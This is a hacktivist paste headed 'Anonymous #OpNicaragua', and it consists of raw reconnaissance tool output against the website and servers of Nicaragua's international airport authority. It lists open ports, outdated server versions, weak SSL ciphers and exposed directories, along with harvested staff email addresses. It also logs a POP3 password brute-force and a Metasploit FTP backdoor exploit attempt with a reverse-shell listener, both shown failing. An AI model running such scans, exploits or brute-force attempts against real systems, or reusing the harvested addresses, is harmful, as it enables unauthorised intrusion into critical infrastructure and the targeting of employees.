Anonymous #OpNicaragua JTSEC Full Recon #11

Jul 20th, 2018
#######################################################################################################################################
Hostname www.eaai.com.ni ISP Telmex Colombia S.A.
Continent South America Flag
CO
Country Colombia Country Code CO
Region Bogota D.C. Local time 20 Jul 2018 05:42 -05
City Bogotá Postal Code 111311
IP Address 190.85.233.91 Latitude 4.649
Longitude -74.063
#######################################################################################################################################
HostIP:190.212.137.165
HostName:eaai.com.ni

Gathered Inet-whois information for 190.212.137.165
---------------------------------------------------------------------------------------------------------------------------------------


Gathered Inic-whois information for eaai.com.ni
---------------------------------------------------------------------------------------------------------------------------------------
Error: Unable to connect - Invalid Host
ERROR: Connection to InicWhois Server ni.whois-servers.net failed
close error

Gathered Netcraft information for eaai.com.ni
---------------------------------------------------------------------------------------------------------------------------------------

Retrieving Netcraft.com information for eaai.com.ni
Netcraft.com Information gathered

Gathered Subdomain information for eaai.com.ni
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
HostName:www.eaai.com.ni
HostIP:190.85.233.91
Searching Altavista.com:80...
Found 1 possible subdomain(s) for host eaai.com.ni, Searched 0 pages containing 0 results

Gathered E-Mail information for eaai.com.ni
---------------------------------------------------------------------------------------------------------------------------------------
Searching Google.com:80...
Searching Altavista.com:80...
Found 0 E-Mail(s) for host eaai.com.ni, Searched 0 pages containing 0 results

Gathered TCP Port information for 190.212.137.165
---------------------------------------------------------------------------------------------------------------------------------------

Port State

53/tcp open
80/tcp open
110/tcp open

Portscan Finished: Scanned 150 ports, 7 ports were in state closed

#######################################################################################################################################
[i] Scanning Site: https://eaai.com.ni



B A S I C I N F O
=======================================================================================================================================


[+] Site Title: Empresa Administradora de Aeropuertos Internacionales
[+] IP address: 190.212.137.165
[+] Web Server: Apache/2.0.52 (Red Hat)
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!



G E O I P L O O K U P
=======================================================================================================================================

[i] IP Address: 190.212.137.165
[i] Country: NI
[i] State: Managua
[i] City: Managua
[i] Latitude: 12.150800
[i] Longitude: -86.268303



H T T P H E A D E R S
=======================================================================================================================================


[i] HTTP/1.1 200 OK
[i] Date: Fri, 20 Jul 2018 10:35:03 GMT
[i] Server: Apache/2.0.52 (Red Hat)
[i] X-Powered-By: PHP/4.3.9
[i] Content-Length: 384
[i] Connection: close
[i] Content-Type: text/html; charset=UTF-8



D N S L O O K U P
=======================================================================================================================================

;; Truncated, retrying in TCP mode.
eaai.com.ni. 43200 IN NS ns1.eaai.com.ni.
eaai.com.ni. 43200 IN NS mail1.eaai.com.ni.
eaai.com.ni. 43200 IN TXT "v=spf1 a:ns1.eaai.com.ni -all"
eaai.com.ni. 43200 IN NS ns2.enitel.net.ni.
eaai.com.ni. 43200 IN SOA ns1.eaai.com.ni. root.eaai.com.ni. 2018052301 10800 3600 2419200 3600
eaai.com.ni. 43200 IN NS ns.enitel.net.ni.
eaai.com.ni. 43200 IN A 190.212.137.165
eaai.com.ni. 43200 IN MX 0 ns1.eaai.com.ni.
eaai.com.ni. 43200 IN A 190.212.137.166



S U B N E T C A L C U L A T I O N
=======================================================================================================================================

Address = 190.212.137.165
Network = 190.212.137.165 / 32
Netmask = 255.255.255.255
Broadcast = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits = 0
Max. Hosts = 1 (2^0 - 0)
Host Range = { 190.212.137.165 - 190.212.137.165 }



N M A P P O R T S C A N
=======================================================================================================================================


Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
Nmap scan report for eaai.com.ni (190.212.137.165)
Host is up (0.082s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.166
rDNS record for 190.212.137.165: ns1.eaai.com.ni
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
80/tcp open http Apache httpd 2.0.52
110/tcp open pop3
143/tcp filtered imap
443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
3389/tcp filtered ms-wbt-server
Service Info: Host: ns.eaai.com.ni

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds



S U B - D O M A I N F I N D E R
=======================================================================================================================================


[i] Total Subdomains Found : 3

[+] Subdomain: ns1.eaai.com.ni
[-] IP: 190.212.137.165

[+] Subdomain: web.eaai.com.ni
[-] IP: 190.85.233.91

[+] Subdomain: pat.eaai.com.ni
[-] IP: 190.212.137.164
#######################################################################################################################################
[?] Enter the target: https://www.eaai.com.ni/
[!] IP Address : 190.85.233.91
[!] Server: Apache/2.2.3 (CentOS)
[+] Clickjacking protection is not in place.
[+] Operating System : CentOS
[!] www.eaai.com.ni doesn't seem to use a CMS
[+] Honeypot Probabilty: 0%
---------------------------------------------------------------------------------------------------------------------------------------
[~] Trying to gather whois information for www.eaai.com.ni
[+] Whois information found
[-] Unable to build response, visit https://who.is/whois/www.eaai.com.ni
---------------------------------------------------------------------------------------------------------------------------------------
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
80/tcp open http Apache httpd 2.2.3
110/tcp filtered pop3
143/tcp filtered imap
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
3389/tcp filtered ms-wbt-server
---------------------------------------------------------------------------------------------------------------------------------------

[+] DNS Records

[+] Host Records (A)
www.eaai.com.niHTTP: (190.85.233.91) AS14080 Telmex S.A. Colombia

[+] TXT Records

[+] DNS Map: https://dnsdumpster.com/static/map/eaai.com.ni.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)


[+] Emails found:
---------------------------------------------------------------------------------------------------------------------------------------
pixel-1532083623873460-web-@www.eaai.com.ni

[+] Hosts found in search engines:
---------------------------------------------------------------------------------------------------------------------------------------
[-] Resolving hostnames IPs...
[+] Virtual hosts:
---------------------------------------------------------------------------------------------------------------------------------------
[~] Crawling the target for fuzzable URLs
#######################################################################################################################################
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
Nmap scan report for eaai.com.ni (190.212.137.165)
Host is up (0.082s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.166
rDNS record for 190.212.137.165: ns1.eaai.com.ni
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
23/tcp filtered telnet
80/tcp open http Apache httpd 2.0.52
110/tcp open pop3
143/tcp filtered imap
443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
3389/tcp filtered ms-wbt-server
Service Info: Host: ns.eaai.com.ni

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds
#######################################################################################################################################
Start: Fri Jul 20 10:48:00 2018
HOST: whatweb Loss% Snt Last Avg Best Wrst StDev
1.|-- 45.55.64.253 0.0% 3 11.4 4.4 0.9 11.4 6.0
2.|-- 138.197.251.16 0.0% 3 0.4 5.4 0.4 14.9 8.2
3.|-- 138.197.244.32 0.0% 3 1.0 1.0 1.0 1.1 0.0
4.|-- ix-ae-3-0.tcore1.n75-new-york.as6453.net 0.0% 3 0.9 0.9 0.8 0.9 0.0
5.|-- if-ae-12-2.tcore2.nto-new-york.as6453.net 0.0% 3 1.1 1.2 1.1 1.3 0.0
6.|-- be3011.ccr31.jfk05.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.7 0.0
7.|-- be3294.ccr41.jfk02.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.6 0.0
8.|-- be2806.ccr41.dca01.atlas.cogentco.com 0.0% 3 8.2 8.3 8.2 8.5 0.0
9.|-- be2112.ccr41.atl01.atlas.cogentco.com 0.0% 3 18.6 18.7 18.6 18.8 0.0
10.|-- be3482.ccr21.mia01.atlas.cogentco.com 0.0% 3 32.4 32.4 32.3 32.4 0.0
11.|-- be3400.ccr21.mia03.atlas.cogentco.com 0.0% 3 33.3 33.4 33.3 33.7 0.0
12.|-- 38.142.153.74 0.0% 3 58.3 57.6 56.9 58.3 0.0
13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
18.|-- 162-137-212-190.enitel.net.ni 0.0% 3 80.4 80.5 80.4 80.7 0.0
19.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0

#######################################################################################################################################
Ip Address Status Type Domain Name Server
---------- ------ ---- ----------- ------
190.85.233.91 302 alias beta.eaai.com.ni Apache/2.2.3 (CentOS)
190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
190.85.233.91 302 alias intranet.eaai.com.ni Apache/2.2.3 (CentOS)
190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
190.212.137.166 301 host mail.eaai.com.ni Apache/2.0.52 (Red Hat)
190.212.137.166 301 host mail1.eaai.com.ni Apache/2.0.52 (Red Hat)
190.212.137.165 301 host ns.eaai.com.ni Apache/2.0.52 (Red Hat)
190.212.137.165 301 host ns1.eaai.com.ni Apache/2.0.52 (Red Hat)
190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
190.85.233.91 302 alias www.eaai.com.ni Apache/2.2.3 (CentOS)
190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
#######################################################################################################################################
[*] Performing General Enumeration of Domain: eaai.com.ni
[-] DNSSEC is not configured for eaai.com.ni
[*] SOA ns1.eaai.com.ni 190.212.137.165
[*] NS ns2.enitel.net.ni 200.62.64.65
[*] NS ns1.eaai.com.ni 190.212.137.165
[*] NS ns.enitel.net.ni 200.62.64.1
[*] NS mail1.eaai.com.ni 190.212.137.166
[*] MX ns1.eaai.com.ni 190.212.137.165
[*] A eaai.com.ni 190.212.137.165
[*] A eaai.com.ni 190.212.137.166
[*] TXT eaai.com.ni v=spf1 a:ns1.eaai.com.ni -all
[*] Enumerating SRV Records
[-] No SRV Records Found for eaai.com.ni
[+] 0 Records Found
#######################################################################################################################################
[*] Processing domain eaai.com.ni
[+] Getting nameservers
200.62.64.65 - ns2.enitel.net.ni
190.212.137.165 - ns1.eaai.com.ni
200.62.64.1 - ns.enitel.net.ni
190.212.137.166 - mail1.eaai.com.ni
[-] Zone transfer failed

[+] TXT records found
"v=spf1 a:ns1.eaai.com.ni -all"

[+] MX records found, added to target list
0 ns1.eaai.com.ni.

[*] Scanning eaai.com.ni for A records
190.212.137.166 - eaai.com.ni
190.212.137.165 - eaai.com.ni
190.85.233.91 - beta.eaai.com.ni
190.85.233.91 - intranet.eaai.com.ni
190.212.137.166 - mail.eaai.com.ni
190.212.137.166 - mail1.eaai.com.ni
190.212.137.165 - ns.eaai.com.ni
190.212.137.165 - ns1.eaai.com.ni
190.85.233.91 - web.eaai.com.ni
190.85.233.91 - www.eaai.com.ni
#######################################################################################################################################
[+] Emails found:
------------------
despachodevuelos@eaai.com.ni
webm@eaai.com.ni
comercial@eaai.com.ni
larostegui@eaai.com.ni
rrodriguez@eaai.com.ni
jsaballos@eaai.com.ni
salonvip@eaai.com.ni
blu@eaai.com.ni
emironda@eaai.com.ni
slopezsam@eaai.com.ni
aarellano@eaai.com.ni

[+] Hosts found in search engines:
---------------------------------------------------------------------------------------------------------------------------------------

Total hosts: 5

[-] Resolving hostnames IPs...

...eaai.com.ni : empty
.eaai.com.ni : empty
mail.eaai.com.ni : 190.212.137.166
mail1.eaai.com.ni : 190.212.137.166
www.eaai.com.ni : 190.85.233.91
#######################################################################################################################################
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 190.212.137.165

Testing SSL server eaai.com.ni on port 443 using SNI name eaai.com.ni

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Insecure session renegotiation supported

TLS Compression:
Compression disabled

Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Accepted TLSv1.0 256 bits AES256-SHA
Preferred SSLv3 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Accepted SSLv3 256 bits AES256-SHA
Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
Accepted SSLv3 128 bits AES128-SHA
Accepted SSLv3 128 bits RC4-SHA
Accepted SSLv3 128 bits RC4-MD5
Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 1024 bits
Accepted SSLv3 112 bits DES-CBC3-SHA
Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA DHE 1024 bits
Accepted SSLv3 56 bits DES-CBC-SHA
Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA DHE 512 bits
Accepted SSLv3 40 bits EXP-DES-CBC-SHA RSA 512 bits
Accepted SSLv3 40 bits EXP-RC2-CBC-MD5 RSA 512 bits
Accepted SSLv3 40 bits EXP-RC4-MD5 RSA 512 bits
Preferred SSLv2 128 bits RC2-CBC-MD5
Accepted SSLv2 128 bits RC4-MD5
Accepted SSLv2 112 bits DES-CBC3-MD5
Accepted SSLv2 64 bits RC4-64-MD5
Accepted SSLv2 56 bits DES-CBC-MD5
Accepted SSLv2 40 bits EXP-RC2-CBC-MD5
Accepted SSLv2 40 bits EXP-RC4-MD5

SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 2048

Subject: *.eaai.com.ni
Altnames: DNS:*.eaai.com.ni, DNS:eaai.com.ni
Issuer: Starfield Secure Certificate Authority - G2

Not valid before: Aug 5 22:21:00 2017 GMT
Not valid after: Aug 3 22:31:00 2018 GMT
#######################################################################################################################################
[+] searching (sub)domains for eaai.com.ni using built-in wordlist
[+] using maximum random delay of 10 millisecond(s) between requests

beta.eaai.com.ni
IP address #1: 190.85.233.91

intranet.eaai.com.ni
IP address #1: 190.85.233.91

mail.eaai.com.ni
IP address #1: 190.212.137.166

ns.eaai.com.ni
IP address #1: 190.212.137.165

ns1.eaai.com.ni
IP address #1: 190.212.137.165

pv.eaai.com.ni
IP address #1: 165.98.58.22

web.eaai.com.ni
IP address #1: 190.85.233.91

www.eaai.com.ni
IP address #1: 190.85.233.91

#######################################################################################################################################
=======================================================================================================================================
| [*] http://eaai.com.ni/ redirected to http://eaai.com.ni/
| [*] New target is: http://eaai.com.ni/
=======================================================================================================================================
| Domain: http://eaai.com.ni/
| Server: Apache/2.0.52 (Red Hat)
| IP: 190.212.137.165
=======================================================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://eaai.com.ni/icons/
=======================================================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://eaai.com.ni/error/HTTP_NOT_FOUND.html.var
| [+] CODE: 200 URL: http://eaai.com.ni/index.php
| [+] CODE: 200 URL: http://eaai.com.ni/mailman/listinfo
| [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/configtest.php
| [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/read_body.php
=======================================================================================================================================

| E-mails:
| [+] E-mail Found: mailman@eaai.com.ni
| [+] E-mail Found: dmvega@eaai.com.ni
|######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------
+ Target IP: 190.85.233.91
+ Target Hostname: www.eaai.com.ni
+ Target Port: 443
---------------------------------------------------------------------------------------------------------------------------------------
+ SSL Info: Subject: /OU=Domain Control Validated/CN=*.eaai.com.ni
Ciphers: DHE-RSA-AES256-SHA
Issuer: /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2
+ Start Time: 2018-07-20 11:54:59 (GMT-4)
---------------------------------------------------------------------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Cookie fc7239472d86929b3f9e2af089868681 created without the secure flag
+ Cookie joomsef_lang created without the secure flag
+ Cookie joomsef_lang created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-logged-in' found, with contents: False
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 6737953, size: 865, mtime: Mon Oct 27 11:48:10 2014
+ Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (401)
+ Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie sj_lifemag_tpl created without the secure flag
+ Cookie sj_lifemag_tpl created without the httponly flag
+ Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 15 entries which should be manually viewed.
+ Server is using a wildcard certificate: *.eaai.com.ni
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
: Connection timed out
+ Scan terminated: 19 error(s) and 27 item(s) reported on remote host
+ End Time: 2018-07-20 12:33:23 (GMT-4) (2304 seconds)
---------------------------------------------------------------------------------------------------------------------------------------
#######################################################################################################################################
dnsenum VERSION:1.2.4

----- eaai.com.ni -----


Host's addresses:
__________________

eaai.com.ni. 55136 IN A 190.212.137.166
eaai.com.ni. 55136 IN A 190.212.137.165


Name Servers:
______________

mail1.eaai.com.ni. 55151 IN A 190.212.137.166
ns1.eaai.com.ni. 55151 IN A 190.212.137.165
ns.enitel.net.ni. 19689 IN A 200.64.62.1
ns.enitel.net.ni. 19689 IN A 200.62.64.1
ns2.enitel.net.ni. 19689 IN A 200.62.64.65


Mail (MX) Servers:
___________________

ns1.eaai.com.ni. 55149 IN A 190.212.137.165


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for eaai.com.ni on mail1.eaai.com.ni ...

Trying Zone Transfer for eaai.com.ni on ns1.eaai.com.ni ...

Trying Zone Transfer for eaai.com.ni on ns.enitel.net.ni ...

Trying Zone Transfer for eaai.com.ni on ns2.enitel.net.ni ...

brute force file not specified, bay.
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:52 EDT
Nmap scan report for eaai.com.ni (190.212.137.166)
Host is up (0.88s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.165
rDNS record for 190.212.137.166: mail1.eaai.com.ni
Not shown: 451 closed ports, 20 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
110/tcp open pop3
554/tcp open rtsp

Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
Nmap scan report for eaai.com.ni (190.212.137.166)
Host is up (0.55s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.165
rDNS record for 190.212.137.166: mail1.eaai.com.ni

PORT STATE SERVICE
53/udp open domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
88/udp open|filtered kerberos-sec
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
389/udp open|filtered ldap
520/udp open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
+ -- --=[Port 21 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
Nmap scan report for eaai.com.ni (190.212.137.166)
Host is up (0.24s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.165
rDNS record for 190.212.137.166: mail1.eaai.com.ni

PORT STATE SERVICE VERSION
21/tcp open ftp?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: D-Link embedded, TRENDnet embedded
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
Network Distance: 1 hop
RHOST => eaai.com.ni
RHOSTS => eaai.com.ni
[-] eaai.com.ni:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (eaai.com.ni:21).
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 10.211.1.29:4444
[*] eaai.com.ni:21 - Sending Backdoor Command
[*] Exploit completed, but no session was created.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:07 EDT
Nmap scan report for eaai.com.ni (190.212.137.165)
Host is up.
Other addresses for eaai.com.ni (not scanned): 190.212.137.166
rDNS record for 190.212.137.165: ns1.eaai.com.ni

PORT STATE SERVICE VERSION
53/tcp filtered domain
Too many fingerprints match this host to give specific OS details

Host script results:
| dns-brute:
| DNS Brute-force hostnames:
| info.com.ni - 50.17.205.182
| oracle.com.ni - 156.151.59.19
| cdn.com.ni - 186.1.31.3
|_ forum.com.ni - 54.86.188.65

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 ... 30
#######################################################################################################################################

^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' \ / __////7/ /,' \ ,' \ / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
<
...'

WAFW00F - Web Application Firewall Detection Tool

By Sandro Gauci && Wendel G. Henrique

Checking http://eaai.com.ni
The site http://eaai.com.ni is behind a Imperva SecureSphere
Number of requests: 9
#######################################################################################################################################

wig - WebApp Information Gatherer


Scanning https://eaai.com.ni...
______________________ SITE INFO _______________________
IP Title
190.212.137.165 Empresa Administradora de Ae
190.212.137.166

_______________________ VERSION ________________________
Name Versions Type
Apache 2.0.52 Platform
PHP 4.3.9 Platform
Red Hat Enterprise Linux RHEL-4.8 OS

________________________________________________________
Time: 1.8 sec Urls: 599 Fingerprints: 40401
#######################################################################################################################################
HTTP/1.1 301 Moved Permanently
Date: Fri, 20 Jul 2018 20:58:48 GMT
Server: Apache/2.0.52 (Red Hat)
Location: https://eaai.com.ni/
Connection: close
Content-Type: text/html; charset=iso-8859-1
#######################################################################################################################################
[+] Screenshot saved to /usr/share/sniper/loot/eaai.com.ni/screenshots/eaai.com.ni-port80.jpg
+ -- --=[Port 110 opened... running tests...
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:11 EDT
Nmap scan report for eaai.com.ni (190.212.137.165)
Host is up (0.53s latency).
Other addresses for eaai.com.ni (not scanned): 190.212.137.166
rDNS record for 190.212.137.165: ns1.eaai.com.ni

PORT STATE SERVICE VERSION
110/tcp open pop3
| fingerprint-strings:
| GenericLines:
| +OK Server Ready
| -ERR Invalid command
| -ERR Invalid command
| HTTPOptions:
| -ERR Invalid command
| -ERR Invalid command
| Server Ready
| NULL:
|_ +OK Server Ready
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 351 guesses in 132 seconds, average tps: 2.7
|_ ERROR: Failed to connect.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.70%I=7%D=7/20%Time=5B524FF5%P=x86_64-pc-linux-gnu%r(NUL
SF:L,13,"\+OK\x20Server\x20Ready\x20\r\n")%r(GenericLines,3F,"\+OK\x20Serv
SF:er\x20Ready\x20\r\n-ERR\x20Invalid\x20command\r\n-ERR\x20Invalid\x20com
SF:mand\r\n")%r(HTTPOptions,3F,"-ERR\x20Invalid\x20command\r\n-ERR\x20Inva
SF:lid\x20command\r\n\+OK\x20Server\x20Ready\x20\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: D-Link embedded, TRENDnet embedded
OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
Network Distance: 1 hop

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 544.31 ms ns1.eaai.com.ni (190.212.137.165)

#######################################################################################################################################
I, [2018-07-20T17:13:44.645938 #14869] INFO -- : Initiating port scan
Traceback (most recent call last):
3: from yasuo.rb:700:in `<main>'
2: from yasuo.rb:132:in `run'
1: from yasuo.rb:232:in `process_nmap_scan'
yasuo.rb:232:in `each_slice': invalid slice size (ArgumentError)
I, [2018-07-20T17:13:48.570743 #14869] INFO -- : Using nmap scan output file logs/nmap_output_2018-07-20_17-13-44.xml
#######################################################################################################################################